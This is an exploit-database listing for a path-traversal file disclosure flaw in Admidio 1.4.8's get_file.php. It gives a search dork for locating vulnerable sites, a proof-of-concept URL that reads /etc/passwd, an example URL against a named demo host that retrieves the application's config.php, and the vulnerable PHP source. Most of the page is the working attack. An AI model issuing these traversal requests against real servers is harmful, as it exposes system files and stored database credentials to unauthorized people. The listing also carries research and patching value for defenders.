[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Admidio 1.4.8 (getfile.php) Remote File Disclosure Vulnerability

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2979
Category
web applications
Date add
08-05-2008
Platform
unsorted
================================================================
Admidio 1.4.8 (getfile.php) Remote File Disclosure Vulnerability
================================================================




/---------------------------------------------------------------\
+                                				+
+        	Admidio 1.4.8 Remote File Disclosure            +
+                                				+
\---------------------------------------------------------------/


[*] Download    : http://prdownloads.sourceforge.net/admidio/admidio-1.4.8.zip

[*] Bug Type    : Remote File Disclosure

[*] Dork    : "Admidio Team"

[*] POC        : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=

[*] Example    : http://demo.admidio.org/adm_program/modules/download/get_file.php?folder=&file=../../adm_config/config.php&default_folder=

[*] Source    :
    ..........................................................

    $file   = strStripTags(urldecode($_GET['file']));
    $act_folder     = "../../../adm_my_files/download";

    ..........................................................

    $file_name   = "$act_folder/$file";
    $file_length = filesize("$act_folder/$file");
    
    ..........................................................
    
    header("Content-Type: application/octet-stream");
    header("Content-Length: $file_length");
    header("Content-Disposition: attachment; filename=\"$file\"");

    header('Cache-Control: private');
    readfile($file_name);



#  0day.today [2024-12-25]  #